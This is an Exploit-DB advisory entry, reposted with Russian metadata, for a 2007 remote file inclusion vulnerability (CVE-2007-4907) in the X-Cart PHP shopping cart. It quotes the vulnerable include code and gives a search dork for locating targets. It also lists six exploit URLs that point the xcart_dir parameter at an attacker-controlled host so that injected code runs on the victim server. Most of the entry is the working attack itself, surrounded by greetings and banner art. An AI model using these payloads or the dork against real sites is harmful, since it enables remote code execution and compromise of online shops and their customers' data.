- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4396
- Проверка EDB
-
- Пройдено
- Автор
- ALIIF
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-4907
- Дата публикации
- 2007-09-11
Код:
## xCart Remote file inclusion ##
## Download script : http://www.x-cart.com//
## Discovered By : aLiiF a.k.a [arif] @debuteam 07/09/2007
## HomePage : http://www.debuteam.net//
## Thx to : Debu Newbie Payment Yogac nyubi Rozi ^S0n_g0ku^
Kuris Sonix Toxicity newbi3 R4yn4ld0 DisJocKey
s3ng0k home_edition Holong home_edition2001
th0nk Scr3W_W0rm jayoes and aLL @Debutem @Mildnet
########### ###########
## ##
## 333 444555 HH HH KK K ##
## 333 3332222 444 555 1133311 HH HH KK K ##
## 333 33322222 444 55 11 11 HH HH #### 00000 KKKK ##
## 333 333 22 444 55 11 11 HHaaHH ## 00 KKK ##
## 333 333 22 444 55 11 11 HH HH ##### 00 KKKK ##
## 333 333 22 444 555 11 11 HH HH # ## 00 KK K ##
## 333 333 22 444555 1133311 HH HH ##### 00000 KK K ##
## ##
########## ##########
/*****************************************************************************\
+-----------------------------------------------------------------------------+
| X-Cart |
| Copyright (c) 2001-2004 Ruslan R. Fazliev <[email protected]> |
| All rights reserved. |
+-----------------------------------------------------------------------------+
#
# $Id: config.php,v 1.297.2.9 2004/02/05 12:25:43 mclap Exp $
#
# Global definitions & common functions
#
@include $xcart_dir."/prepare.php";
#
# Create Smarty object
#
if (!@include $xcart_dir."/smarty.php") {
#################################################################################
## Dork : "X-CART. Powerful PHP shopping cart software" ##
## ##
=-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-=
## http://www.target.com/[xcart-path]/config.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/prepare.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/smarty.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/customer/product.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/provider/auth.php?xcart_dir=http://urhost/[inject]?
## http://www.target.com/[xcart-path]/admin/auth.php?xcart_dir=http://urhost/[inject]?
===================================================================
## Contack person : [email protected]
## ViVa Debuteam !!!
# milw0rm.com [2007-09-11]
- Источник
- www.exploit-db.com